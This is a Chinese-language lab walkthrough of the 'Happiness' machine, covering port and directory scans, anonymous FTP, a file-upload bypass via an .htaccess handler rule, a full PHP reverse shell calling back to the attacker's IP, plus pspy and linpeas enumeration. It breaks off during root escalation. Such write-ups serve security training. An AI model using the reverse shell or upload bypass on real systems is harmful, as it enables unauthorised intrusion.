信息收集

rustscan扫描

1
# rustscan -a 192.168.0.106 -- -A
2
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
3
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
4
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
5
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
6
The Modern Day Port Scanner.
7
________________________________________
8
: http://discord.skerritt.blog         :
9
: https://github.com/RustScan/RustScan :
10
 --------------------------------------
11
😵 https://admin.tryhackme.com
12

13
[~] The config file is expected to be at "/root/.rustscan.toml"
14
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
15
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
16
Open 192.168.0.106:53
17
Open 192.168.0.106:80
18
Open 192.168.0.106:21
19
Open 192.168.0.106:22
20
[~] Starting Script(s)
21
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.106
22
Depending on the complexity of the script, results may take some time to appear.
23
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-24 01:28 EST
24
NSE: Loaded 156 scripts for scanning.
25
NSE: Script Pre-scanning.
26
NSE: Starting runlevel 1 (of 3) scan.
27
Initiating NSE at 01:28
28
Completed NSE at 01:28, 0.00s elapsed
29
NSE: Starting runlevel 2 (of 3) scan.
30
Initiating NSE at 01:28
31
Completed NSE at 01:28, 0.00s elapsed
32
NSE: Starting runlevel 3 (of 3) scan.
33
Initiating NSE at 01:28
34
Completed NSE at 01:28, 0.00s elapsed
35
Initiating ARP Ping Scan at 01:28
36
Scanning 192.168.0.106 [1 port]
37
Completed ARP Ping Scan at 01:28, 0.07s elapsed (1 total hosts)
38
Initiating Parallel DNS resolution of 1 host. at 01:28
39
Completed Parallel DNS resolution of 1 host. at 01:28, 0.01s elapsed
40
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
41
Initiating SYN Stealth Scan at 01:28
42
Scanning 192.168.0.106 [4 ports]
43
Discovered open port 21/tcp on 192.168.0.106
44
Discovered open port 80/tcp on 192.168.0.106
45
Discovered open port 22/tcp on 192.168.0.106
46

47
PORT   STATE  SERVICE REASON         VERSION
48
21/tcp open   ftp     syn-ack ttl 64 vsftpd 2.0.8 or later
49
| ftp-syst:
50
|   STAT:
51
| FTP server status:
52
|      Connected to 192.168.0.108
53
|      Logged in as ftp
54
|      TYPE: ASCII
55
|      No session bandwidth limit
56
|      Session timeout in seconds is 300
57
|      Control connection is plain text
58
|      Data connections will be plain text
59
|      At session startup, client count was 2
60
|      vsFTPd 3.0.3 - secure, fast, stable
61
|_End of status
62
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
63
|_-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
64
22/tcp open   ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
65
| ssh-hostkey:
66
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
67
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
68
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
69
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
70
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
71
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
72
53/tcp closed domain  reset ttl 64
73
80/tcp open   http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
74
|_http-server-header: Apache/2.4.62 (Debian)
75
| http-methods:
76
|_  Supported Methods: GET POST OPTIONS HEAD
77
|_http-title: Site doesn't have a title (text/html).
78
MAC Address: 08:00:27:BF:9E:C8 (Oracle VirtualBox virtual NIC)
79
Device type: general purpose
80
Running: Linux 4.X|5.X
81
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
82
OS details: Linux 4.15 - 5.8
83
TCP/IP fingerprint:
84
OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=21%CT=53%CU=43047%PV=Y%DS=1%DC=D%G=Y%M=0800
85
OS:27%TM=6974669D%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=105%TI=Z%CI=Z%
86
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
87
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
88
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
89
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
90
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
91
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
92
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
93
OS:DFI=N%T=40%CD=S)
94

95
Uptime guess: 43.869 days (since Thu Dec 11 04:37:52 2025)
96
Network Distance: 1 hop
97
TCP Sequence Prediction: Difficulty=264 (Good luck!)
98
IP ID Sequence Generation: All zeros
99
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
100

101
TRACEROUTE
102
HOP RTT     ADDRESS
103
1   0.30 ms 192.168.0.106
104

105
NSE: Script Post-scanning.
106
NSE: Starting runlevel 1 (of 3) scan.
107
Initiating NSE at 01:28
108
Completed NSE at 01:28, 0.00s elapsed
109
NSE: Starting runlevel 2 (of 3) scan.
110
Initiating NSE at 01:28
111
Completed NSE at 01:28, 0.00s elapsed
112
NSE: Starting runlevel 3 (of 3) scan.
113
Initiating NSE at 01:28
114
Completed NSE at 01:28, 0.00s elapsed
115
Read data files from: /usr/share/nmap
116
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
117
Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds
118
           Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.450KB)

目录扫描

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# gobuster dir -u 192.168.0.106 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
3
===============================================================
4
Gobuster v3.6
5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6
===============================================================
7
[+] Url:                     http://192.168.0.106
8
[+] Method:                  GET
9
[+] Threads:                 64
10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
11
[+] Negative Status codes:   404
12
[+] User Agent:              gobuster/3.6
13
[+] Extensions:              yaml,php,txt,html,zip,db,bak,js
14
[+] Timeout:                 10s
15
===============================================================
16
Starting gobuster in directory enumeration mode
17
===============================================================
18
/index.html           (Status: 200) [Size: 19]
19
/.html                (Status: 403) [Size: 278]
20
/.php                 (Status: 403) [Size: 278]
21
/.html                (Status: 403) [Size: 278]
22
/.php                 (Status: 403) [Size: 278]
23
/server-status        (Status: 403) [Size: 278]

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# dirsearch -u 192.168.0.106
3

4

5
  _|. _ _  _  _  _ _|_    v0.4.3.post1
6
 (_||| _) (/_(_|| (_| )
7

8
Extensions: php, aspx, jsp, html, js | HTTP method: GET
9
Threads: 25 | Wordlist size: 11460
10

11
Output File: /home/kali/Desktop/hmv/reports/_192.168.0.106/_26-01-24_01-30-10.txt
12

13
Target: http://192.168.0.106/
14

15
[01:30:10] Starting:
16
[01:30:12] 403 -  278B  - /.ht_wsr.txt
17
[01:30:12] 403 -  278B  - /.htaccess.orig
18
[01:30:12] 403 -  278B  - /.htaccess.sample
19
[01:30:12] 403 -  278B  - /.htaccess.bak1
20
[01:30:12] 403 -  278B  - /.htaccess.save
21
[01:30:12] 403 -  278B  - /.htaccess_extra
22
[01:30:12] 403 -  278B  - /.htaccess_orig
23
[01:30:12] 403 -  278B  - /.htaccess_sc
24
[01:30:12] 403 -  278B  - /.htaccessBAK
25
[01:30:12] 403 -  278B  - /.htm
26
[01:30:12] 403 -  278B  - /.html
27
[01:30:12] 403 -  278B  - /.htaccessOLD2
28
[01:30:12] 403 -  278B  - /.htaccessOLD
29
[01:30:12] 403 -  278B  - /.htpasswds
30
[01:30:12] 403 -  278B  - /.httr-oauth
31
[01:30:12] 403 -  278B  - /.htpasswd_test
32
[01:30:13] 403 -  278B  - /.php
33
[01:31:03] 403 -  278B  - /server-status
34
[01:31:03] 403 -  278B  - /server-status/
35

36
Task Completed

21端口

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# ftp 192.168.0.106
3
Connected to 192.168.0.106.
4
220 Have fun!
5
Name (192.168.0.106:kali): ^C
6

7

8
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
9
└─# ftp anonymous@192.168.0.106
10
Connected to 192.168.0.106.
11
220 Have fun!
12
230 Login successful.
13
Remote system type is UNIX.
14
Using binary mode to transfer files.
15
ftp> ls
16
229 Entering Extended Passive Mode (|||11835|)
17
150 Here comes the directory listing.
18
-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
19
226 Directory send OK.
20
ftp> get readme.txt
21
local: readme.txt remote: readme.txt
22
229 Entering Extended Passive Mode (|||37629|)
23
150 Opening BINARY mode data connection for readme.txt (20 bytes).
24
100% |***********|    20       32.99 KiB/s    00:00 ETA
25
226 Transfer complete.
26
20 bytes received in 00:00 (11.55 KiB/s)
27
ftp> exit
28
221 Goodbye.

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# cat readme.txt
3
http://tmpfile.dsz/
4

5
vi /etc/hosts
6
192.168.0.106 tmpfile.dsz

二次目录扫描

1
gobuster dir -u http://tmpfile.dsz/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64

1
  _|. _ _  _  _  _ _|_    v0.4.3.post1
2
 (_||| _) (/_(_|| (_| )
3

4
Extensions: php, aspx, jsp, html, js | HTTP method: GET
5
Threads: 25 | Wordlist size: 11460
6

7
Output File: /home/kali/Desktop/hmv/reports/_tmpfile.dsz/_26-01-24_01-34-18.txt
8

9
Target: http://tmpfile.dsz/
10

11
[01:34:18] Starting:
12
[01:34:19] 403 -  276B  - /.ht_wsr.txt
13
[01:34:19] 403 -  276B  - /.htaccess.bak1
14
[01:34:19] 403 -  276B  - /.htaccess_orig
15
[01:34:19] 403 -  276B  - /.htaccess.orig
16
[01:34:19] 403 -  276B  - /.htaccess_extra
17
[01:34:19] 403 -  276B  - /.htaccessOLD2
18
[01:34:19] 403 -  276B  - /.htaccess_sc
19
[01:34:19] 403 -  276B  - /.htaccessOLD
20
[01:34:19] 403 -  276B  - /.html
21
[01:34:19] 403 -  276B  - /.htaccess.save
22
[01:34:19] 403 -  276B  - /.htpasswds
23
[01:34:19] 403 -  276B  - /.htm
24
[01:34:19] 403 -  276B  - /.httr-oauth
25
[01:34:19] 403 -  276B  - /.htaccess.sample
26
[01:34:19] 403 -  276B  - /.htpasswd_test
27
[01:34:19] 403 -  276B  - /.htaccessBAK
28
[01:34:20] 403 -  276B  - /.php
29
[01:34:54] 403 -  276B  - /server-status
30
[01:34:54] 403 -  276B  - /server-status/
31
[01:35:01] 301 -  312B  - /uploads  ->  http://tmpfile.dsz/uploads/
32
[01:35:01] 200 -  454B  - /uploads/

http://tmpfile.dsz↗

/index

1
<!DOCTYPE html>
2
<html lang="zh-CN">
3
<head>
4
    <meta charset="UTF-8">
5
        <title>MazeSec - 临时文件转存站</title>
6
      <style>
7
              body { font-family: sans-serif; background: #f4f4f4; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
8
        .container { background: #fff; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); width: 400px; text-align: center; }
9
        .logo { color: #2c3e50; font-size: 24px; font-weight: bold; margin-bottom: 10px; border-bottom: 2px solid #2c3e50; display: inline-block; padding: 0 10px; }
10
        .banner { font-size: 14px; color: #7f8c8d; margin-bottom: 25px; }
11
        input[type="file"] { margin: 20px 0; }
12
        input[type="submit"] { background: #2c3e50; color: white; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; }
13
        .message { margin-top: 20px; font-size: 13px; color: #e74c3c; word-break: break-all; }
14
    </style>
15
      </head>
16
      <body>
17
          <div class="container">
18
            <div class="logo">MazeSec</div>
19
              <div class="banner">安全、快速的临时文件中转中枢</div>
20
                <form action="" method="post" enctype="multipart/form-data">
21
                      <input type="file" name="file" required><br>
22
                            <input type="submit" name="submit" value="开始上传">
23
                        </form>
24
                          <div class="message"></div>
25
                        </div>
26
                        </body>
27
</html>

1
<?php
2
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
3
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
4

5
set_time_limit (0);
6
$VERSION = "1.0";
7
$ip = '192.168.0.108';
8
$port = 6666;
9
$chunk_size = 1400;
10
$write_a = null;
11
$error_a = null;
12
$shell = 'uname -a; w; id; bash -i';
13
$daemon = 0;
14
$debug = 0;
15

16
if (function_exists('pcntl_fork')) {
17
  $pid = pcntl_fork();
18

19
  if ($pid == -1) {
20
    printit("ERROR: Can't fork");
21
    exit(1);
22
  }
23

24
  if ($pid) {
25
    exit(0);  // Parent exits
26
  }
27
  if (posix_setsid() == -1) {
28
    printit("Error: Can't setsid()");
29
    exit(1);
30
  }
31

32
  $daemon = 1;
33
} else {
34
  printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
35
}
36

37
chdir("/");
38

39
umask(0);
40

41
// Open reverse connection
42
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
43
if (!$sock) {
44
  printit("$errstr ($errno)");
45
  exit(1);
46
}
47

48
$descriptorspec = array(
49
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
50
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
51
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
52
);
53

54
$process = proc_open($shell, $descriptorspec, $pipes);
55

56
if (!is_resource($process)) {
57
  printit("ERROR: Can't spawn shell");
58
  exit(1);
59
}
60

61
stream_set_blocking($pipes[0], 0);
62
stream_set_blocking($pipes[1], 0);
63
stream_set_blocking($pipes[2], 0);
64
stream_set_blocking($sock, 0);
65

66
printit("Successfully opened reverse shell to $ip:$port");
67

68
while (1) {
69
  if (feof($sock)) {
70
    printit("ERROR: Shell connection terminated");
71
    break;
72
  }
73

74
  if (feof($pipes[1])) {
75
    printit("ERROR: Shell process terminated");
76
    break;
77
  }
78

79
  $read_a = array($sock, $pipes[1], $pipes[2]);
80
  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
81

82
  if (in_array($sock, $read_a)) {
83
    if ($debug) printit("SOCK READ");
84
    $input = fread($sock, $chunk_size);
85
    if ($debug) printit("SOCK: $input");
86
    fwrite($pipes[0], $input);
87
  }
88

89
  if (in_array($pipes[1], $read_a)) {
90
    if ($debug) printit("STDOUT READ");
91
    $input = fread($pipes[1], $chunk_size);
92
    if ($debug) printit("STDOUT: $input");
93
    fwrite($sock, $input);
94
  }
95

96
  if (in_array($pipes[2], $read_a)) {
97
    if ($debug) printit("STDERR READ");
98
    $input = fread($pipes[2], $chunk_size);
99
    if ($debug) printit("STDERR: $input");
100
    fwrite($sock, $input);
101
  }
102
}
103

104
fclose($sock);
105
fclose($pipes[0]);
106
fclose($pipes[1]);
107
fclose($pipes[2]);
108
proc_close($process);
109

110
function printit ($string) {
111
  if (!$daemon) {
112
    print "$string\n";
113
  }
114
}
115

116
?>

1
<FilesMatch "mac">
2
Sethandler application/x-httpd-php
3
</FilesMatch>

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nc -lvvp 6666
3
listening on [any] 6666 ...
4
connect to [192.168.0.108] from tmpfile.dsz [192.168.0.106] 53656
5
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 GNU/Linux
6
 01:51:31 up 24 min,  0 users,  load average: 0.24, 3.62, 9.51
7
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
8
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

提权-Eecho@Happiness

1
www-data@Happiness:/tmp$ ./pspy64
2
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
3

4

5
     ██▓███    ██████  ██▓███ ▓██   ██▓
6
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
7
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
8
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
9
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
10
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
11
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
12
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
13
                   ░           ░ ░
14
                               ░ ░
15

16
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
17
Draining file system events due to startup...
18
done
19
2026/01/24 02:00:07 CMD: UID=33    PID=12259  | ./pspy64
20
2026/01/24 02:00:07 CMD: UID=33    PID=12226  | bash -i
21
2026/01/24 02:00:07 CMD: UID=33    PID=12222  | sh -c uname -a; w; id; bash -i
22
2026/01/24 02:00:07 CMD: UID=33    PID=685    | /usr/sbin/apache2 -k start
23
2026/01/24 02:00:07 CMD: UID=0     PID=394    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
24
2026/01/24 02:00:07 CMD: UID=0     PID=386    | /usr/sbin/vsftpd /etc/vsftpd.conf
25
2026/01/24 02:00:07 CMD: UID=0     PID=380    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
26
2026/01/24 02:00:07 CMD: UID=0     PID=367    | /sbin/agetty -o -p -- \u --noclear tty1 linux
27
2026/01/24 02:00:07 CMD: UID=0     PID=361    | /usr/sbin/inetutils-inetd
28
2026/01/24 02:00:07 CMD: UID=0     PID=339    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
29
2026/01/24 02:00:07 CMD: UID=0     PID=336    | /lib/systemd/systemd-logind
30
2026/01/24 02:00:07 CMD: UID=0     PID=323    | /usr/sbin/rsyslogd -n -iNONE
31
2026/01/24 02:00:07 CMD: UID=104   PID=321    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

1
find / -writable -type d 2>/dev/null
2
/run/lock
3
/run/lock/apache2
4
/dev/mqueue
5
/dev/shm
6
/tmp
7
/proc/12500/task/12500/fd
8
/proc/12500/fd
9
/proc/12500/map_files
10
/var/www/html
11
/var/www/html/uploads
12
/var/www/localhost
13
/var/tmp
14
/var/lib/php/sessions
15
/var/cache/apache2/mod_cache_disk
16
www-data@Happiness:/opt$ cat Ee
17
cat Eecho_pass.txt
18
Eecho:2VQzte2RBr8p8MuOA0Gw2Sum

拿到凭据Eecho:2VQzte2RBr8p8MuOA0Gw2Sum

1
Eecho@Happiness:~$ cat user.txt
2
flag{user-c2fdb0243cc742b18dcb4e5e68eed318}

提权-root

1
Eecho@Happiness:~$ sudo -l
2

3
We trust you have received the usual lecture from the local System
4
Administrator. It usually boils down to these three things:
5

6
    #1) Respect the privacy of others.
7
    #2) Think before you type.
8
    #3) With great power comes great responsibility.
9

10
[sudo] password for Eecho:
11
Sorry, user Eecho may not run sudo on Happiness.

pspy

1
Eecho@Happiness:~$ wget http://192.168.0.108:8000/pspy64 -O pspy64
2
--2026-01-24 02:13:07--  http://192.168.0.108:8000/pspy64
3
Connecting to 192.168.0.108:8000... connected.
4
HTTP request sent, awaiting response... 200 OK
5
Length: 3104768 (3.0M) [application/octet-stream]
6
Saving to: ‘pspy64’
7

8
pspy64        100%   2.96M  --.-KB/s    in 0.009s
9

10
2026-01-24 02:13:07 (333 MB/s) - ‘pspy64’ saved [3104768/3104768]
11

12
Eecho@Happiness:~$ ls
13
pspy64  user.txt
14
Eecho@Happiness:~$ chmod 777 pspy64
15
Eecho@Happiness:~$ ./pspy64
16
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
17

18

19
     ██▓███    ██████  ██▓███ ▓██   ██▓
20
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
21
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
22
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
23
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
24
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
25
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
26
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
27
                   ░           ░ ░
28
                               ░ ░
29

30
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
31
Draining file system events due to startup...
32
done
33
2026/01/24 02:13:47 CMD: UID=1000  PID=12538  | ./pspy64
34
2026/01/24 02:13:47 CMD: UID=1000  PID=12528  | -bash
35
2026/01/24 02:13:47 CMD: UID=1000  PID=12527  | sshd: Eecho@pts/0
36
2026/01/24 02:13:47 CMD: UID=1000  PID=12508  | (sd-pam)
37
2026/01/24 02:13:47 CMD: UID=1000  PID=12507  | /lib/systemd/systemd --user
38
2026/01/24 02:13:47 CMD: UID=0     PID=12504  | sshd: Eecho [priv]
39
2026/01/24 02:13:47 CMD: UID=33    PID=12442  | bash -i
40
2026/01/24 02:13:47 CMD: UID=33    PID=12438  | sh -c uname -a; w; id; bash -i
41
2026/01/24 02:13:47 CMD: UID=0     PID=12277  | 2026/01/24 02:13:47 CMD: UID=33    PID=12271  | bash -i
42
2026/01/24 02:13:47 CMD: UID=33    PID=12266  | sh -c uname -a; w; id; bash -i
43
2026/01/24 02:13:47 CMD: UID=33    PID=685    | /usr/sbin/apache2 -k start
44
2026/01/24 02:13:47 CMD: UID=0     PID=394    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
45
2026/01/24 02:13:47 CMD: UID=0     PID=386    | /usr/sbin/vsftpd /etc/vsftpd.conf
46
2026/01/24 02:13:47 CMD: UID=0     PID=380    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
47
2026/01/24 02:13:47 CMD: UID=0     PID=367    | /sbin/agetty -o -p -- \u --noclear tty1 linux
48
2026/01/24 02:13:47 CMD: UID=0     PID=361    | /usr/sbin/inetutils-inetd
49
2026/01/24 02:13:47 CMD: UID=0     PID=339    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
50
2026/01/24 02:13:47 CMD: UID=0     PID=336    | /lib/systemd/systemd-logind
51
2026/01/24 02:13:47 CMD: UID=0     PID=323    | /usr/sbin/rsyslogd -n -iNONE
52
2026/01/24 02:13:47 CMD: UID=104   PID=321    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
53
2026/01/24 02:13:47 CMD: UID=0     PID=320    | /usr/sbin/cron -f
54
2026/01/24 02:13:47 CMD: UID=101   PID=278    | /lib/systemd/systemd-timesyncd
55
2026/01/24 02:13:47 CMD: UID=0     PID=249    | /lib/systemd/systemd-udevd
56
2026/01/24 02:13:47 CMD: UID=0     PID=1      | /sbin/init
57
2026/01/24 02:14:34 CMD: UID=0     PID=12547  | sshd: [accepted]
58
2026/01/24 02:14:34 CMD: UID=0     PID=12548  | sshd: [accepted]
59
2026/01/24 02:14:41 CMD: UID=0     PID=12549  | sshd: Eecho [priv]
60
2026/01/24 02:14:41 CMD: UID=0     PID=12550  | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
61
2026/01/24 02:14:41 CMD: UID=0     PID=12551  | run-parts --lsbsysinit /etc/update-motd.d
62
2026/01/24 02:14:41 CMD: UID=0     PID=12552  | /bin/sh /etc/update-motd.d/10-uname
63
2026/01/24 02:14:41 CMD: UID=0     PID=12553  | run-parts --lsbsysinit /etc/update-motd.d
64
2026/01/24 02:15:12 CMD: UID=0     PID=12559  | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
65
2026/01/24 02:15:12 CMD: UID=0     PID=12560  | /bin/sh /sbin/dhclient-script

linpeas.sh

1
Eecho@Happiness:~$ ./linpeas.sh
2

3
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
4
Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
5
 LEGEND:
6
  RED/YELLOW: 95% a PE vector
7
  RED: You should take a look to it
8
  LightCyan: Users with console
9
  Blue: Users without console & mounted devs
10
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
11
  LightMagenta: Your username
12

13
 Starting LinPEAS. Caching Writable Folders...
14
                               ╔═══════════════════╗
15
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
16
                               ╚═══════════════════╝
17
OS: Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
18
User & Groups: uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)
19
Hostname: Happiness
20
[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
21
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)
22
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
23
                     ╔════════════════════╗
24
══════════════════════════════╣ System Information ╠══════════════════════════════
25
                              ╚════════════════════╝
26
╔══════════╣ Operative system
27
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits
28
Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
29
Distributor ID: Debian
30
Description:    Debian GNU/Linux 10 (buster)
31
Release:        10
32
Codename:       buster
33

34
╔══════════╣ Sudo version
35
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
36
Sudo version 1.9.5p2
37
╔══════════╣ PATH
38
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses
39
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
40
